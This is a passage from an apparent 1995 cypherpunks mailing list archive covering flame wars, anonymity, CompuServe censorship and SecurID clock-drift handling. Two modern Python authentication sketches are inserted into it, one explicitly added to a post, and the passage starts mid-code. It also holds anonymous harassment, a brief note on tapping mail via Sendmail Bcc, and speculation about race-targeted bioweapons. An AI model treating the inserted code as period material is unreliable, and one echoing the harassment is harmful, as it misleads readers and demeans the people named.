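    return str(value % 10 ** CODE_DIGITS).zfill(CODE_DIGITS)


class AuthServer:
    """Server side: regenerates the code from its own record of seed and time."""

    def __init__(self, drift_steps: int = 1):
        self.drift_steps = drift_steps   # tolerated clock skew, in time steps
        self.records = {}

    def enroll(self, user: str, seed: bytes, pin: str) -> None:
        # Simplification: a production server would store a PIN verifier, not the PIN.
        self.records[user] = {"seed": seed, "pin": pin, "failures": 0,
                              "last_step": -1, "disabled": False}

    def verify(self, user: str, passcode: str, now: int) -> bool:
        """passcode is the memorized PIN prepended to the displayed token-code."""
        rec = self.records.get(user)
        if rec is None or rec["disabled"]:
            return False
        step = self._matching_step(rec, passcode, now)
        if step is None:
            rec["failures"] += 1
            if rec["failures"] >= MAX_FAILURES:
                rec["disabled"] = True      # card disabled after repeated failures
            return False
        rec["failures"] = 0
        rec["last_step"] = step             # a code is accepted once, then burned
        return True

    def _matching_step(self, rec, passcode: str, now: int):
        pin, code = passcode[:-CODE_DIGITS], passcode[-CODE_DIGITS:]
        pin_ok = hmac.compare_digest(pin.encode(), rec["pin"].encode())
        current = now // STEP_SECONDS
        for step in range(current - self.drift_steps, current + self.drift_steps + 1):
            if step <= rec["last_step"]:
                continue                    # replayed or older code
            expected = token_code(rec["seed"], step * STEP_SECONDS)
            if hmac.compare_digest(code.encode(), expected.encode()) and pin_ok:
                return step
        return None


if __name__ == "__main__":
    t0 = 820_454_400                        # constructed clock value: 1996-01-01 00:00:00 UTC
    server = AuthServer()
    server.enroll("alice", SEED, "4711")    # constructed user and PIN
    code = token_code(SEED, t0)
    print("token displays:", code)
    print("PIN + code accepted:", server.verify("alice", "4711" + code, t0 + 5))
    print("same passcode replayed:", server.verify("alice", "4711" + code, t0 + 20))
    print("code without PIN:", server.verify("alice", token_code(SEED, t0 + 60), t0 + 60))
```

The drift window is what lets a token whose clock has slipped by one step still authenticate, and the last-accepted step is what stops a passcode overheard on a phone line from being reused within the same display interval.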






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 31 Dec 1995 17:31:10 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: Internet wiretap?
Message-ID: <v02140a04ad0bef0837f0@[165.254.158.214]>
MIME-Version: 1.0
Content-Type: text/plain


At 20:09 12/29/95, Joel McNamara wrote:

>This tidbit was posted a few hours ago on c|net (12/29 4:00 PST).
>
>        Thanks to a wiretap on the Internet, three people have been arrested
>for illegally
>        selling and manufacturing cellular phone equipment and electronic
>devices over the Internet,
>        according to Secret Service agent Brian Gimlett. This is the first
>time the Secret Service and the
>        Drug Enforcement Administration were allowed to wiretap via the
>Internet, says Gimlett.
>
>The rest of the story talks about an exchange of e-mail discussing the sale
>of various nasty
>cellular accessories.  There is no information on exactly what "wiretap"
>means or any other
>technical details.  Interesting to note the DEA was in on it.

It is not that hard to "tap" a user's account if you are the SMTP server
(you just put a Bcc on all outgoing mail and add an extra account to all
incoming mail's Envelope). A few lines in the Sendmail parms would do this
very simply.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Sun, 31 Dec 1995 11:30:33 +0800
To: cypherpunks@toad.com
Subject: Trolling for L00ns was Re: is Freddy Boy a Loon
Message-ID: <199512310305.EAA03110@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




Ah... the targets bit perfectly... You  see
fred my boy being zapped by a nym wouldn't hurt SO
bad unless on some level you believed the anon posters 
assertions about your behaviours were TRUE...
you reacted exactly as predicted, as have David Sternlight,
L Detweiler and a host of others... I normally lurk except when
I get a chance to send anon barbs to puncture an EGO as
inflated as yours..

    anon
p.s. You are next vlad...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sun, 31 Dec 1995 19:20:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: anon.penet addresses in .sigs
In-Reply-To: <gFkygD49w165w@bwalk.dm.com>
Message-ID: <199512311100.GAA18408@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Subject: Re: anon.penet addresses in .sigs
To: cypherpunks@toad.com (Cypherpunks Mailing List)

Dr. Dimitri Vulis writes:
> This is fascinating! Could you please explain (for the benefit of clueless
> Ph.D.'s like myself) how putting your anon id in your signature enables folks
> to send you anonymous e-mail, who couldn't do that before by e-mailing
> anon@anon.penet.fi and adding:
> 
> X-Anon-To: erc@dal1820.computek.net

This issue (the penet address in Ed's .sig) has been covered on the list 
before. The next time around I think I'll write a short FAQ.

The direct address is easier to use, especially for people whose mailers
don't allow them to add arbitrary email headers. Note that the ratio of
users of the various cypherpunk remailers to users of anon.penet is even 
lower than the S/N ratio on this list in December.

In certain parts of Usenet, many people routinely advertise addresses at
anon.penet (and similar services) in their .sigs (as Ed does) to make 
pseudonymized replies as convenient as possible. This is not a new phenomenon.

Happy New Year !

Futplex <futplex@pseudonym.com>		Brand new key, ID: 0x0F5470D9 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 1 Jan 1996 03:25:48 +0800
To: cypherpunks@toad.com
Subject: Can We Cut the Crap?
Message-ID: <ad0c14fb020210041a1c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Really, the S/N ratio is approaching all-time lows, even for the Silly
Season of Xmas. A week or so ago there was a massive flame war involving
insults and counter-insults--I returned from my Xmas vacation to find the
list melting down. Now, a week later, a new flamewar has erupted.

There is no point in the back-and-forth of insults, "Dr. Fred is a loon,"
"Alice is Detweiler," and other such nonsense. If you don't want to read
the comments of Fred Cohen, Dimitri Vulis, Alice whatever,
Vlad/Lance/Larry/Pablo, then just don't read them! Filter them out, delete
them immediately, read them briefly, whatever.

At 5:04 PM 12/31/95, deadbeat wrote:

>Regarding Fred Cohen, PhD:
>

[typical personal insults elided]

>Let's also consider the granting institution, a second-rank school.

Well, not quite. I seem to recall that Cohen's advisor at USC was Len
Adleman, known perhaps to some of you as the "A" in RSA and more recently
as the guy doing the "DNA computing" work. He was also working on viruses,
perhaps in conjunction with Cohen, as of 1987-88, and gave an interesting
paper at the 1988 Crypto Conference on "An Abstract Theory of Computer
Viruses." Not surprisingly, Cohen's papers were the main citations.

I recall Adleman describing in the oral talk just how it is that
determining if a given program contains a virus is essentially equivalent
to solving the halting problem, i.e., it may be undecidable whether a
program has a virus, except presumably in some special cases (e.g., for
very small programs).

>Cohen's thesis broke new ground, but how many people have read it, or any of
>his writings, or know anything about his ideas beyond a single word?  How far
>did he carry this work?  Where are the conference and journal papers?  Cohen's
>reputation faded into obscurity long ago.  Now he is building a new reputation
>as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

I have plenty to disagree with some of what Fred Cohen says, as I do with
many people, but this is just plain ignorant.

"How many people have read it, or any of his writings..." is a ridiculous
argument, even for an ad hominem. Those who want to read it, can read it.
The articles are readily available. I've even seen some of his books on the
bookshelves of my local bookstores (haven't read them, though I flipped
through "It's Alive!" and didn't see much of interest....but how many of us
have written _any_ books?). I'm not convinced there's much more about the
_theory_ of viruses to "push forward," for various reasons. The theory was
laid out, some Bulgarians and others are busily writing viruses, but
there's not likely to be some whole reservoir of new theory to be worked
on. (This is true of a lot of fields, where the work done decades ago
basically was complete....look at how we all cite Garey and Johnson and how
little has changed in the field of NP-completeness.)

Blasting Cohen because you don't think he carried his work far enough is
clearly blasting wildly. Have you asked whether others on this list have
carried the work they did in their early careers far enough? (Did I carry
my work in the 1970s on alpha particle effects on chips far enough, or am I
just a Cohen-like slacker because I moved on to other things?)

Anyway, if you don't like Sternlight, or Cohen, or May, or Detweiler, or
Metzger, or Vulis, *filter* them out!

So why don't I just do this? Well, I do have a filter file in my Eudora Pro
mailer, and I use it. But I still see the crossfire on the list, the
pointless flames and personal attacks. This angers and saddens me. Hence
this message.

While I don't subscribe to the extreme view espoused by some, that the
topics of the list should be exclusively crypto, math, programming, and
Internet standards, I do think people should try to find some relevance to
the larger themes of the list. The recent increase in "one-sentence
repartee" is indicative of late-stage list meltdown. (Some of the posts
here quote a couple of paragraphs, add one or two lines of insults, then
have another screenful of PGP sigs, auto-signing sigs, anonymous IDs, and
then a conventional sig. Jeesh!)

I'm hoping that this is just a Xmas vacation silly season.

--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Mon, 1 Jan 1996 05:30:47 +0800
To: cypherpunks@toad.com
Subject: The F.C. flamewar
Message-ID: <199512312115.NAA07063@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


You know, if I worked for an organization that was dedicated to restricting
strong crypto, eliminating people's privacy rights, monitoring and recording
everything that people say or write, etc. etc. ad infinitum, I'd probably
spend at least a part of every day sitting in front of my computer in my
little cubicle somewhere in Virginia, making posts to cypherpunks just like
these ... 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 1 Jan 1996 02:46:01 +0800
To: an5877@anon.penet.fi
Subject: Re: Fred Cohen, PhD
In-Reply-To: <9512311704.AA03856@anon.penet.fi>
Message-ID: <9512311818.AA16259@all.net>
MIME-Version: 1.0
Content-Type: text


> Regarding Fred Cohen, PhD:
> 
> Cohen's haughty and bombastic style do nothing good for his reputation.  I
> assume he advertises his PhD to highlight his early accomplishments; he has
> done little since.

Apparently you have a reading disability.  I haven't used Ph.D. next to my
name on this forum for some time.

> Let's also consider the granting institution, a second-rank school.

When you insult me, that's one thing, but insulting my school is
something quite different.  The University of Southern California is one
of the finest educational institutions in the world, and is widely
recognized as such.  The engineering school at USC (from which I earned
my Ph.D.) is commonly ranked in the top 10 in the US, and in the year
that I graduated, my department was ranked in the top 5 in the US.

USC, in addition to having a fine athletic tradition, also has many
unique benefits that set it apart from many other excellent schools. 
But I wouldn't want to advertise in this forum - you'll have to contact
them directly for more extensive information.

> Cohen's thesis broke new ground, but how many people have read it, or any of
> his writings, or know anything about his ideas beyond a single word?  How far
> did he carry this work?  Where are the conference and journal papers?  Cohen's
> reputation faded into obscurity long ago.  Now he is building a new reputation
> as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.

Some people are ignorant because they haven't had a chance to learn, but
other people are ignorant because they choose to be.  In your case, it is
apparently the latter.  But I will answer your questions nonetheless:

How many people have read it, or any of his writings, or know anything
about his ideas beyond a single word?

	The thesis has only sold a few hundred copies, however, over
	20,000 people have read my books on the subject.  My two
	articles in "The Sciences" reached about 25,000 people each.
	But I don't think that the value of peoples' work is a
	function of how many people know about them.

How far did he carry this work?

	I have published over 30 refereed journal articles on the subject,
	about 50 conference papers, about 100 invited talks, and today,
	over 1/2 of all computers in the world run virus defense software
	using techniques I first published.  That's more refereed papers
	than anyone else in the world on that particular subject.

Where are the conference and journal papers?

	They are listed on the Web site listed below.  They include
	IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM,
	DPMA, IFIP, and NIST conferences (as well as many others).

So, now that we have a very brief history of my work, let us all know
where you went to school, how many journal and conference papers you
have published, how many books you have written.

We already know that you won't tell people your name because you are
afraid to have it associated with you personally, but maybe you can help
us all understand how expert you are and what you have contributed to
the world so we can appreciate your point of view.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Sun, 31 Dec 1995 10:44:51 +0800
To: cypherpunks@toad.com
Subject: Massey, CEO of Compuserve, on Internet
Message-ID: <199512310220.NAA16258@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>Wow! I am watching the CEO of Compuserve being interviewed on CNBC,
>explaining how his company is "taking the high road by complying with the
>laws of Germany" in removing access to 200 Usenet groups.

>Timothy C. May

I assume that C$ is only filtering the newsfeed as it hits German shores?
Please tell me they aren't denying access to these "banned" newsgroups for
all users worldwide!

Mark
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Mon, 1 Jan 1996 06:14:45 +0800
To: cypherpunks@toad.com
Subject: A great time to be a cypherpunk
Message-ID: <199512312146.NAA22286@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



   Amidst all the silliness, flames, and lunacy of this list, there's
a tremendous amount of exciting stuff going on. I thought I'd take the
opportunity to do one of those self-indulgent look back at the year
postings.

   Cypherpunks write code. One of the best things about 1995 was the
volume and quality of cpunk code that was released, and, perhaps
equally importantly, existing cpunk programs that continue to be
supported and improved.
   Here's a subjective top 5 list:

1. SSLeay, by Eric Young and Tim Hudson. Ordinarily, I wouldn't
consider a crypto library to be all that newsworthy, but SSLeay is
clearly an exception. SSLeay's real strength is its ability to be
integrated easily into real applications, including Apache/SSL,
Mosaic, telnet, etc.

I'll go out on a limb and guess that one of the reasons why SSLeay is
so good is that Eric has a lot of experience doing this kind of thing.
His libdes code dates back at least to 1990, and (I think) even
further.

2. Ssh, by Tatu Ylonen. There are quite a few secure shells around.
What sets ssh apart is its dedication to usability. It is one of the
few crypto applications that is _more_ usable than the non-crypto
version. The transparent X forwarding is fabulous.

3. Mixmaster, by Lance Cottrell. Finally, we have remailers that come
close to real cryptographic security. The mixmasters are more
reliable, in addition to more secure, than the type-1 remailers. The
client is well written with a fairly easy interface. No wonder it's
becoming so popular.

4. Alpha.c2.org, by Matt Ghio. The idea of pseudonyms incorporating
strong cryptography has long been a cypherpunk dream. Thanks to Matt's
work in writing and maintaining this nymserver, it's now reality.
There are well over a thousand nyms registered on alpha.c2.org now,
and that's likely to increase now that automated tools are becoming
available.

5. Netscape, by Jeff Weinstein et al. Netscape Navigator is the first
massively popular program to incorporate strong crypto. The email
hasn't materialized yet, and there have been some scary statements by
top management, but I'm hopeful that this program will become the
primary vehicle for achieving cypherpunk goals.

   Code, while important, is not the only useful cypherpunk activity.
It's also been a great year for getting the word out there. The Net
was _the_ hot story this year, and a lot of the coverage had a
cypherpunk spin. Much of the credit goes to Sameer Parekh for his PR
work. I know some cypherpunks dislike the "interview yourself" style
of press release writing, but I'm very glad that we've got someone on
our side who's good at it and is willing to put in the work.
   More broadly, we've found that our viewpoint and opinion matters.
People are at a loss for how to think about the Net and its social
implications. We've been thinking about that for a while, and have
something to add to the discussion, and people are listening.

   1995 will surely go down in history as the year that The Great
Drive to Censor the Net began. The powers that be will continue
pushing ahead with laws restricting speech, increasing liability for
speech, and outlawing strong crypto.
   A short term effect will be to create some real differentiation
between service providers. Up to now, the difference between one
service provider and another has been an equation with bits on one
side and dollars on the other. Starting soon, it will make a
difference in what information can be easily accessed. A domain name
of compuserve.com now clearly labels its account holder as a free
speech inactivist. More cypherpunkish domain names are a sign of not
being afraid of information.
   Over the long term, I agree with Lucky. The powers that be will
have some success in censoring the Unwashed Massnet. However,
cypherpunks will be able to create an infrastructure where freedom of
speech thrives. A large part of this work is the development of
censor-resistant protocols. My favorite such protocol is NNTP, even
though it contains no crypto.
   HTTP is also a bit censor-resistant because it's so easy to set up
a Web server. However, it still has grave weaknesses from this
perspective, because of the need for a full time Internet connection
_and_ storage in order to publish on the Web. The Web can become
either more centralized or more decentralized, and there are strong
forces pushing in both directions.
   I think the best hope for a cypherpunk Web is to emphasize dual-use
techniques, those that advance mundane as well as cpunk goals. For
example, distributed caching will make transfers go faster and make
"unable to connect to server; try connecting again later" errors much
less frequent. If done right, it can also make part-time Web servers
feasible, and perhaps make it extremely difficult to delete documents
that the publisher didn't want deleted (can anyone say "cryptographic
authentication?"). Similarly, the same crypto-enabled filters that
keep spam out of Joe Random's mailbox can drive a real public key
infrastructure (Web relevance: the Web is the natural home for a
pubkey infrastructure. Let's make sure to be there for the
housewarming party).

   The way that the low-tech protocols of the Web have crushed and
assimilated corporate Weblike networks is inspiring - it holds out
real hope we can win, even against opponents as dedicated and powerful
as governments. It will take hard work, tenacity, cooperation, and
technical sophistication, though. Remember that Windows took about
seven years to become successful.

   For dud of the year, I'd have to nominate Java. Don't get me wrong,
this language shows a lot of potential. But, to a large extent,
they've done the easy part, and the hard part remains. Given its
existing security model, it's difficult or impossible to do anything
really interesting with Java. Yet, fixing the security model _is_ the
hard part. Best of luck to the Java people and all javapunks, but I
think a strong case can be made that the hype machine went overboard.

   To all the cypherpunks who helped make 1995 such an exciting year,
best holiday greetings and wishes for 1996.

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Mon, 1 Jan 1996 03:25:59 +0800
To: wb8foz@nrk.com
Subject: SecurIDs (was Re: Australian "calculatorcard")
Message-ID: <v02130500ad0c83fd970b@[198.115.179.213]>
MIME-Version: 1.0
Content-Type: text/plain


        amp <Alan.Pugh@internetMCI.COM> described his SecurID:

>> sounds like the card i use for remote dialup to certain non-public
>> systems i use at work. it has a six digit number on the front that
>> changes every 60 seconds.

        David Lesher <wb8foz@nrk.com> asked:

>Do these card systems use a window to handle clock-slip?

        SDI's ACE/Server or ACE access control module (ACM) has a Progress
RDBS built in which maintains a constantly-updated historical record of the
_relative_ drift in a particular token's clock-chip, relative to the clock
in the server or host.  When it receives the first identifier from a user
(Name) submitting a SecurID authentication call, the server checks the
database for the recorded drift and then predicts what that particular
token will use as Current Time.  CT, together with a token-specific secret
key, is then hashed to generate a token-code which is matched with that
submitted by the user,  together with the user's memorized PIN.

>I'd think you could have the server safely accept # N, N-60 sec, and
>N+60 seconds; and adjust the server's idea of your card's clock speed
>from that.

        You have it almost exactly right (or, at least, that's how SDI's
ACE/SecurID system handles it;-) SDI throws in a couple other factors:  the
ACE system handles Current Time in 30 or 60-second blocks (depending on the
model of SecurID token being authenticated,) so it needs a little leeway to
handle a token which, because of drift, slips into the next time-slot or
the one behind.

        The ACE system actually pre-calculates three token-codes -- each a
pseudo-random number, so one will not inform your guess of another -- as it
waits for a user's incoming authentication call to be completed.  The
server will approve access if it receives a token code generated from
either its _projected_ Current Time (for this particular token,) or the
token-codes generated from Current Time plus or minus one time-slot.

        When the ACE database indicates that this particular SecurID token
has not been used in the past 60 days (many sysadmins make this 90 days) it
also kicks in a search mode to minimize the false rejections.  In search
mode it calculates a series of prospective card-codes, sweeping out to a
maximum of 10 time-slots (the actual scope of the search is defined by the
sysadmin) fore and aft of whatever the database suggests this token should
consider Current Time.  If it finds a match between the token-code
submitted from a long-unused SecurID and one of those calculated by the
server in search mode, it updates its database projection for the drift of
that particular token and then requests the user to submit another PRN
token-code.  A search-mode "match" alone will never result in a user being
authenticated -- it only sets him or her up for a second formal
authentication cycle where a new PRN card-code is matched against a new set
of three token-codes.

        There are also a number of additional security devices and rules
which the server enforces to protect against security threats, racing
spoofs, stolen PINs, stolen tokens, etc.  The most obvious is a secured
record of all incoming authentication calls, recorded by token-code and GMT
time.  All incoming authentication calls are checked against this file. A
SecurID PRN token-code is never accepted twice, and the virtual
"time-stamp" within an incoming SecurID token-code must always be later and
in proper sequence to all other recorded authentication calls.
>
>What new risk would that create?

        If the SDI hash algorithm is of sufficient strength, very little, I
would think.

        (SDI just asked me to create an FAQ for their SecurID, so all
queries are welcome -- on-line or off.)

        Suerte,
                        _Vin


    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>
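
The window, search-mode and replay rules described in the message above, as an added Python sketch that is not part of the original post and is not SDI's code. HMAC-SHA256 stands in for the undisclosed hash, and the names (`AuthServer`, `TokenRecord`, `token_code`), the constants and the slot-counter replay check are assumptions made for illustration.

```python
import hashlib
import hmac

SLOT_SECONDS = 60            # this token model changes its code every 60 s
NORMAL_WINDOW = 1            # projected slot, plus or minus one
SEARCH_WINDOW = 10           # sysadmin-defined sweep for long-unused tokens
IDLE_LIMIT = 60 * 24 * 3600  # 60 days without use triggers search mode


def token_code(secret: bytes, slot: int) -> str:
    """Six-digit code for one time-slot. HMAC-SHA256 is a stand-in here;
    the hash used by the real product is not described in the post."""
    mac = hmac.new(secret, slot.to_bytes(8, "big"), hashlib.sha256).digest()
    return f"{int.from_bytes(mac[:4], 'big') % 1_000_000:06d}"


class TokenRecord:
    """Server-side state kept per token (the drift database in the post)."""

    def __init__(self, secret: bytes, pin: str, now: int):
        self.secret = secret
        self.pin = pin          # kept in the clear only because this is a sketch
        self.drift = 0          # token slot minus server slot, as last observed
        self.last_slot = -1     # newest token slot already consumed
        self.last_used = now    # server time of the last full authentication
        self.resyncing = False  # True between a search-mode match and the 2nd code


class AuthServer:
    def __init__(self):
        self.tokens = {}

    def enroll(self, name: str, secret: bytes, pin: str, now: int) -> None:
        self.tokens[name] = TokenRecord(secret, pin, now)

    def authenticate(self, name: str, pin: str, code: str, now: int) -> str:
        """Return 'ACCEPT', 'DENY', or 'NEXT_CODE' (search-mode match only)."""
        rec = self.tokens.get(name)
        if rec is None or not hmac.compare_digest(pin.encode(), rec.pin.encode()):
            return "DENY"

        idle = now - rec.last_used > IDLE_LIMIT
        searching = idle and not rec.resyncing
        window = SEARCH_WINDOW if searching else NORMAL_WINDOW
        server_slot = now // SLOT_SECONDS
        projected = server_slot + rec.drift  # what this token should call "now"

        # Try the projected slot first, then widen: 0, -1, +1, -2, +2, ...
        offsets = [0] + [s * d for d in range(1, window + 1) for s in (-1, 1)]
        for off in offsets:
            slot = projected + off
            expected = token_code(rec.secret, slot)
            if not hmac.compare_digest(code.encode(), expected.encode()):
                continue
            if slot <= rec.last_slot:
                return "DENY"  # replayed or out-of-sequence code
            rec.last_slot = slot
            rec.drift = slot - server_slot  # update the drift projection
            if searching:
                rec.resyncing = True
                return "NEXT_CODE"  # a search-mode match never authenticates alone
            rec.resyncing = False
            rec.last_used = now
            return "ACCEPT"

        rec.resyncing = False  # a failed second cycle falls back to search mode
        return "DENY"
```

Because the replay check compares slot numbers rather than code strings, a code from the current slot is refused on its second use even though it is still inside the acceptance window.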






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonnyx <jonnyx@edge.edge.net>
Date: Mon, 1 Jan 1996 04:40:18 +0800
To: cypherpunks@toad.com
Subject: (NOISE - LONG) Re: PLA_gue Germ Terrorism
Message-ID: <199512312003.OAA20537@edge.edge.net>
MIME-Version: 1.0
Content-Type: text/plain


Crypto relevance: absolutely none!

Good lord, what nasty reactions! Maybe there's hope for us
after all. I'll allow myself one reply. Sorry 'bout the length.
 
< snip re: my bits on targetting specific genetic traits >

zinc wrote:

> this is so much shit.  targetting anything is very difficult.
> just ask all those people about the wonders of gene therapy. 
> hell, even the economist had an article about it's failures 
> hell, even the economist had an article about its failures 
> recently (Dec 16-22 1995, p77).

Putting a person on the moon was considered impossible by most
folks 50 years ago. The German v-series rockets were cutting
edge technology. Now licensed hobbyists can buy solid fuel
motors that are just as powerful as some of the ones the Nazis 
had (source: _High Power Rocketry_). Things change.
 
> in any event the so-called 'differences' you are imagining 
> are phenotypes.  these are a long cry from DNA.  i'm not 
> aware of any genetic markers available to distinguish a 
> black man from a white man. and, even if there were, 
> recombination requires long stretches of homology between 
> DNAs, not small differences.  i'd bet it's nearly impossible 
> to target black vs white vs yellow vs a gorilla.

Good. The article I read that suggested the possibility (I'm
pretty sure it was in _Science_ or _Scientific American_)
was rather spooky. I wish you'd said FLATLY impossible, though.
I'm (obviously) not a biologist/geneticist/whatever, but aren't 
there bugs that go after only chimps? And didn't that ebola 
strain in Virginia only go after the lab monkeys, not the people?
 
...and from Jim Choate:

> Malarky.

< snip >

> Most of the threat of this type of experiments are from simple 
> infections since viruses are not easily raised with this form 
> of equipment.

People will have access to more and better equipment, though.

> One of my favorite 'technology rulers' is when the first strain 
> of common yeast is released which produces THC or LSD. 

Heh. Guess they'll have to post extra guards at the Wonder Bread 
plant, eh? Wouldn't want terrorists dosing little Jimmy's lunch.

< interesting stuff snipped >
 
> I do not believe we will see this in the near term using the 
> micro-manipulater systems which do direct injection of genetic 
> material because of the cost and utility requirements of such 
> equipment.

Which will probably become simplified, streamlined, and cheaper.
Who knows what techniques will be used 20-50 years from now?
Even though (fortunately) it seems that this kind of virus would
be much tougher to produce than I thought (if not impossible), 
I can still see someone trying it and infecting EVERYONE in his 
neighborhood/city/state.

And if it is possible, well, I'd rather have the idea explored 
and cures developed (with the info available to all) before any
would-be Hitler surprised us. 

Finally, from E. ALLEN SMITH

> E. Coli (the workhorse of prokaryotic genetics) can be a pathogen 
> if the right plasmid is inserted. 

> 	Incidentally, thanks to the person who quashed the 
> "black-seeking virus" idiot. 

Not my idea (I'm not that twisted; I find the idea horrifying). 
I read the suggestion in either _Science_ or _Scientific American_ 
(early 1993?). Incidentally, the idea was a virus that went after
people with specific racial traits, not a "black-seeking virus". 
Don't attribute me with quotes that aren't mine. I have enough
problems with idiots who assume I'm a racist KKK country-music
loving redneck simply because I'm from Nashville.

> Human races are so far from being proper genetically distinct 
> subspecies that nobody competent would call them that, 

Guess what sunshine, they still teach this in mid- and high-schools.
Hell, even my dictionary sez "race - 1) a division of the human
population distinguished by physical characteristics transmitted
by genes." (Webster's II New Riverside Dictionary, if anyone cares)

> if they only weren't us.

Huh?

Now back to our regularly scheduled crypto (yeah, right).

-- 
 
|| ______    || comments, criticisms, and/or death-threats may be sent to: ||
|| \__  /\   ||            jonny anonymous, c/o jonnyx@edge.net            ||
|| __/ /  \  ||  or snail-mail pobox 23001, nashvegas tn 37202-3001, usa   ||
|| \__/_/\_\ ||______"DRIVING DRUNK ON THE INFORMATION SUPERHIGHWAY!"______||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Mon, 1 Jan 1996 04:55:25 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: Fred Cohen, PhD
In-Reply-To: <9512311818.AA16259@all.net>
Message-ID: <199512311909.OAA00177@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Regarding Fred Cohen, PhD:
> > 
> > Cohen's haughty and bombastic style do nothing good for his reputation.  I
> > assume he advertises his PhD to highlight his early accomplishments; he has
> > done little since.
> 
> Apparently you have a reading disability.  I haven't used Ph.D. next to my
> name on this forum for some time.

	.oO( some time = ~3 weeks )

> > Let's also consider the granting institution, a second-rank school.
> 
> When you insult me, that's one thing, but insulting my school is
> something quite different.  The University of Southern California is one
> of the finest educational institutions in the world, and is widely
> recognized as such.

	.oO( So is Alabama State, even says so in the catalog )

>  The engineering school at USC (from which I earned
> my Ph.D.) is commonly ranked in the top 10 in the US, and in the year
> that I graduated, my department was ranked in the top 5 in the US.
> 
> USC, in addition to having a fine athletic tradition, also has many
> unique benefits that set it apart from many other excellent schools. 
> But I wouldn't want to advertise in this forum - you'll have to contact
> them directly for more extensive information.

	.oO( I see you still have their catalog )

> > Cohen's thesis broke new ground, but how many people have read it, or any of
> > his writings, or know anything about his ideas beyond a single word?  How far
> > did he carry this work?  Where are the conference and journal papers?  Cohen's
> > reputation faded into obscurity long ago.  Now he is building a new reputation
> > as a pig-headed loudmouth, threatening his "defamers."  Shades of Sternlight.
> 
> Some people are ignorant because they haven't had a chance to learn, but
> other people are ignorant because they choose to be.  In your case, it is

	.oO( Some people just don't have two clues to rub together )

> apparently the latter.  But I will answer your questions nonetheless:
> 
> How many people have read it, or any of his writings, or know anything
> about his ideas beyond a single word?
> 
> 	The thesis has only sold a few hundred copies, however, over
> 	20,000 people have read my books on the subject.  My two
> 	articles in "The Sciences" reached about 25,000 people each.

	   ( I once told an OJ Simpson joke on Usenet )
	   ( that was supposedly seen by 40 million people )
	.OO( including a dozen messiahs, three space men, )
           ( and a hermaphrodite. )

> 	But I don't think that the value of peoples' work is a
> 	function of how many people know about them.
> 
> How far did he carry this work?
> 
> 	I have published over 30 refereed journal articles on the subject,
> 	about 50 conference papers, about 100 invited talks, and today,
> 	over 1/2 of all computers in the world run virus defense software
> 	using techniques I first published.  That's more refereed papers
> 	than anyone else in the world on that particular subject.

	   ( Also gives Jerry Pournelle something to talk about besides )
	.oO( Wing Commander, hope you add that to your resume )


> Where are the conference and journal papers?
> 
> 	They are listed on the Web site listed below.  They include
> 	IEEE, ACM, and IFIP papers, invited papers at IEEE, ACM,
> 	DPMA, IFIP, and NIST conferences (as well as many others).

	   ( What? No WiReD magazine? How did he escape the crackpot )
	.oO( visionary center of the universe? )
	

> So, now that we have a very brief history of my work, let us all know
> where you went to school, how many journal and conference papers you
> have published, how many books you have written.
>
> We already know that you won't tell people your name because you are
> afraid to have it associated with you personally, but maybe you can help

	   ( Dr. Fred hides behind a post office box so people can't )
	.oO( drop by and tell him he's a loon )

> us all understand how expert you are and what you have contributed to
> the world so we can appreciate your point of view.

	.oO( I ain't no Ph.D, but even I can see Fred is a loon )

> -> See: Info-Sec Heaven at URL http://all.net/

